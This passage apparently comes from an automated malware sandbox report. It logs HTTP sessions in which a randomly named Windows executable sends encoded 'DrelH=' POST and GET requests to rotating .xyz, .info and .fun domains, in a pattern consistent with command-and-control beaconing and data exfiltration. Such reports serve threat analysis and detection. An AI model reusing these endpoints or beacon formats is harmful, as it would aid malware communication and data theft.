                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 78 6a 68 75 74 2b 6f 65 53 59 44 46 72 74 65 4e 68 59 2b 57 46 54 5a 74 2f 54 36 34 34 43 56 46 70 2b 33 69 4c 72 6a 76 52 6a 43 46 49 71 6a 61 68 49 56 2b 58 54 76 31 36 43 58 46 44 72 5a 65 78 6b 4e 4c 70 52 68 51 6a 77 31 7a 6b 4b 44 78 4d 49 62 6f 53 71 45 4f 62 4a 46 39 41 70 4b 2b 55 48 73 36 73 58 33 45 77 59 6e 77 7a 5a 4c 46 62 6c 68 6e 49 6e 74 71 73 55 6b 4b 75 58 39 51 4d 42 38 76 59 37 47 55 31 2f 77 53 4e 58 50 2b 61 58 4e 69 61 73 76 42 4d 75 59 64 6f 66 47 4c 76 73 4a 47 78 77 46 2b 6f 51 67 58 53 4c 48 74 5a 62 63 33 56 4b 69 58 37 76 74 33 5a 4d 4c 34 6c 49 30 6b 75 57 51 61 68 67 53 39 59 47 6c 46 4b 70 78 70 35 74 62 55 4d 32 67 48 33 39 55 48 65 6f 51 70 47 46 52 31 44 4b 64 47 32 74 6a 53 50 6e 47 42 6e 73 51 6f 41 68 54 76 7a 6b 59 47 68 59 64 69 56 62 63 6a 2b 70 61 67 74 67 57 42 59 59 6d 7a 67 4c 2b 6f 42 42 50 30 35 6a 76 61 6f 34 [TRUNCATED]
Data Ascii: DrelH= [TRUNCATED]
Oct 22, 2024 22:57:14.293406963 CEST | 245 | IN | HTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:14 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 53196 | 103.106.67.112 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:16.120002985 CEST | 484 | OUT | GET /hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:57:16.886214018 CEST | 645 | IN | HTTP/1.1 302 Found
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:16 GMT
                                                                                                                                  Content-Length: 209
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 61 69 6c 66 6f 72 65 76 65 72 2e 78 79 7a 2f 68 73 68 70 2f 3f 44 72 65 6c 48 3d 4d 42 69 45 53 72 30 68 50 6d 67 56 46 75 53 44 67 54 31 73 39 32 6a 65 77 48 58 31 54 73 38 42 6a 66 4c 75 73 39 30 4f 61 67 4e 67 68 50 31 62 6f 71 79 35 47 41 54 57 43 63 6b 50 37 32 52 2f 4d 74 36 64 77 72 41 62 4e 6c 78 71 67 33 7a 57 6b 36 5a 41 4c 33 49 37 39 4a 4e 6b 55 4d 58 76 75 31 37 61 64 30 2b 2f 61 4b 68 61 62 4f 70 4c 33 78 76 30 31 7a 51 31 49 78 39 63 45 4c 33 57 5a 41 3d 3d 26 61 6d 70 3b 53 78 3d 67 6e 4d 34 5a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                  Data Ascii: <a href="https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&amp;Sx=gnM4ZH">Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 53212 | 188.114.96.3 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:21.987476110 CEST | 765 | OUT | POST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 61 64 33 48 36 65 32 66 71 72 32 70 75 2f 6a 57 62 75 65 38 5a 45 47 4b 6e 61 5a 45 54 4a 64 51 4c 33 35 32 41 52 70 4c 79 38 53 4e 64 30 65 32 64 44 79 6f 46 6b 55 57 42 75 6e 77 5a 32 6f 69 61 64 4d 6c 47 74 76 6a 7a 6c 64 4d 6b 44 37 35 32 34 38 72 59 73 47 44 50 4d 57 42 63 4a 76 50 42 2f 64 65 6c 7a 61 41 46 34 45 34 32 61 49 51 52 62 33 4f 56 6e 52 55 55 4d 6b 57 6c 48 69 53 49 2f 4a 42 38 69 6f 57 79 42 79 52 59 63 57 48 47 39 46 33 78 42 39 68 75 44 42 61 6d 75 71 50 6e 34 51 32 56 53 42 4f 51 35 78 6a 32 6f 41 74 66 6b 63 68 59 62 50 63 61 57 63 3d
                                                                                                                                  Data Ascii: DrelH=nW04OhvCZUUGad3H6e2fqr2pu/jWbue8ZEGKnaZETJdQL352ARpLy8SNd0e2dDyoFkUWBunwZ2oiadMlGtvjzldMkD75248rYsGDPMWBcJvPB/delzaAF4E42aIQRb3OVnRUUMkWlHiSI/JB8ioWyByRYcWHG9F3xB9huDBamuqPn4Q2VSBOQ5xj2oAtfkchYbPcaWc=
Oct 22, 2024 22:57:22.858637094 CEST | 998 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g17BlI2XQDR7Yw4E2bZjNqXNLYUGG6gDzX9YiuUwyut7cLBegf0T4C0Ug02aDn2WopUjAv9PHYI%2BnQL%2FhsS0ZPolswgDJnbqw4%2FrUbbmDSKjtFDyf2nhnZ5vmrXdo4a4W1WTgQfQ6Obu4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c663bc80d4662-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 53213 | 188.114.96.3 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:24.530455112 CEST | 785 | OUT | POST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Ascii: DrelH=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT75QKXJ2BQpLx8SNIEe/AzyhFkooBszwZy4iad8lHeHgy1dCxz7/7Y8rYsGDPPqrcJnPBrhekXOHIYE/hqIQGr3KVnR6UNoslFaSI+ZB8xwR4ByTX8XVGfgk939xqxFSmtenvu9cPwJmDZdbm7IaOU9IC4fsEBKsbd/uwO6UhqfLnlIz9fPY
Oct 22, 2024 22:57:25.453141928 CEST | 998 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:25 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFX6P1PjLgt0ExkCo76f%2F44F0yoJ2dKiNxMnfh%2FmxLZV3p2EYxCqwENV5FtDEyuv5hjJauO3OkT8gfRnTvL6CE2JXPqOm6FJ6JLp3%2BUMezX3wSrMs6qSUv5fCkGAlTTbexMw3SaQHpamOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c664baf2ce972-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 53214 | 188.114.96.3 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:27.231601000 CEST | 1802 | OUT | POST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH= [TRUNCATED]
Oct 22, 2024 22:57:28.092438936 CEST | 1001 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmH9ifoe%2FMIhysmT3ZRaPky0FeAqEjW4w8b6A0LMBAjdLg66wwufg8QrKzkwsqUuJ1zgMSLb8HpUQaaMbW0b9L5wXMFtx9Urq52Su2Nt3Jo%2Bqc394ps%2FWYIyuHH3UbvIx%2FAc2G7QqgNrbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c665c795728ab-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1802&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 53215 | 188.114.96.3 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:29.764935017 CEST | 488 | OUT | GET /bd77/?Sx=gnM4ZH&DrelH=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHCyUpz7x/SzvZhSZv0Dea0KcHBDKlEtGKZJ6Ek0LYLRuKiHQ== HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:57:30.666951895 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LxblphZLuKi7yr2hFSUhe7l7SdJ%2FUHaXwBjvNWaEte2dfIR6%2Fh%2BopK35eJXtGXtjK%2B4n0zr1wG7uKPVBaYfkmVuVexf7xqxLiEA6XBO6K1xtLtQX%2F%2FeJJAdE2C7wEszlOXGhsPl8s6rxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c666c7a660b76-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Ascii: 234<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
Oct 22, 2024 22:57:30.667082071 CEST | 126 | IN | Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 53216 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:35.726953983 CEST | 771 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Ascii: DrelH=+0MuHPCNpm0aF+/thRSI3KfecgH+7vARstXmjb9YCVAoL22UBWS7vNggPuyk4UdyOPzmuwW7LT+yD9QGjgnytgJZBUTnNaE3e24TYpLXAeylvRgILMflhNJBnvcFTYz/wyYNxYpvJkJszAXRbHzXpknCq4Kv/lkIN+xc+dYNZdJM253IMvMUSekwh/0sXPTe6wy4lck=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 53217 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:57:38.265424013 CEST | 791 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Ascii: DrelH=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCjwoLXGUGSG7sNggBOyt20d7OP/uuxq7LQCyD9AGjSPxswJXN0TlJaE3e24TYpf9AeqluhQIKprmvtJCwfcFXYzzwyYjxadFJnhszBnRbSfUnknAkYLF6lleXo1Tiap3FsBL6vaiWNE8B+IIxs8bG/y3gTiI7LwB07oDsn47r8C5+weYZcmx


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   15 | 192.168.2.5 | 53218 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:40.811918020 CEST | 1808 | OUT | POST /t10u/ HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.mondayigboleague.info
                                                                                                                                  Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 67 51 6f 4c 6c 4f 55 47 77 75 37 74 4e 67 67 4a 75 79 6f 32 30 63 37 4f 50 6e 71 75 78 6e 4d 4c 56 47 79 46 66 34 47 72 44 50 78 6e 77 4a 58 46 55 54 67 4e 61 46 31 65 79 56 62 59 70 50 39 41 65 71 6c 75 69 49 49 63 4d 66 6d 74 74 4a 42 6e 76 63 4a 54 59 7a 66 77 79 67 56 78 5a 78 2f 49 57 42 73 39 42 33 52 5a 6b 72 55 76 6b 6e 47 70 34 4c 64 36 6c 6f 41 58 6f 42 70 69 66 56 4e 46 72 46 4c 2f 62 71 2f 45 66 59 55 66 74 73 43 33 63 41 73 65 72 71 30 76 7a 61 30 36 62 67 55 32 6f 31 76 6e 67 51 62 39 64 48 6c 6d 55 69 4e 52 73 58 71 47 2b 34 50 34 44 73 4d 4c 5a 4c 57 73 57 50 55 53 73 65 4c 42 2f 2b 44 79 44 33 47 76 63 45 57 32 62 76 79 4b 54 56 33 4a 61 41 6f 4c 6f 77 78 63 65 7a 41 78 4d 68 69 49 5a 33 48 58 69 79 35 4f 34 4c 4f 4e 64 45 42 70 62 73 56 43 79 65 72 36 73 31 76 4c 4d 67 43 71 37 37 4c 46 70 73 64 46 6d 55 4c 4b 34 31 72 38 6e 4b 53 73 39 57 50 [TRUNCATED]
                                                                                                                                   Data Ascii: DrelH=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCgQoLlOUGwu7tNggJuyo20c7OPnquxnMLVGyFf4GrDPxnwJXFUTgNaF1eyVbYpP9AequluiIIcMfmttJBnvcJTYzfwygVxZx/IWBs9B3RZkrUvknGp4Ld6loAXoBpifVNFrFL/bq/EfYUftsC3cAserq0vza06bgU2o1vngQb9dHlmUiNRsXqG+4P4DsMLZLWsWPUSseLB/+DyD3GvcEW2bvyKTV3JaAoLowxcezAxMhiIZ3HXiy5O4LONdEBpbsVCyer6s1vLMgCq77LFpsdFmULK41r8nKSs9WP [TRUNCATED]


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   16 | 192.168.2.5 | 53219 | 3.33.130.190 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:43.357148886 CEST | 490 | OUT | GET /t10u/?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.mondayigboleague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:57:44.021413088 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:43 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 263
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 72 65 6c 48 3d 7a 32 6b 4f 45 36 48 64 77 31 55 31 4d 4c 58 6e 71 6d 57 54 39 76 61 39 65 33 2f 38 2b 50 56 74 76 76 72 30 78 35 68 57 45 69 34 53 46 32 53 48 42 47 6d 38 67 4e 68 7a 51 50 58 66 7a 33 38 2f 44 59 7a 2b 6c 67 62 6a 55 30 33 2f 53 34 67 61 6f 30 72 44 71 44 70 4a 44 6e 2f 46 4a 5a 70 79 50 53 35 64 65 35 66 33 43 72 57 4e 2b 7a 51 6b 4c 73 72 61 75 37 56 4d 6c 2b 6b 73 47 39 4f 4b 71 41 3d 3d 26 53 78 3d 67 6e 4d 34 5a 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DrelH=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDqDpJDn/FJZpyPS5de5f3CrWN+zQkLsrau7VMl+ksG9OKqA==&Sx=gnM4ZH"}</script></head></html>


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   17 | 192.168.2.5 | 53220 | 217.70.184.50 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:57:49.161356926 CEST | 741 | OUT | POST /0bvj/ HTTP/1.1
                                                                                                                                  Host: www.stocksm.fun
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.stocksm.fun
                                                                                                                                  Referer: http://www.stocksm.fun/0bvj/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
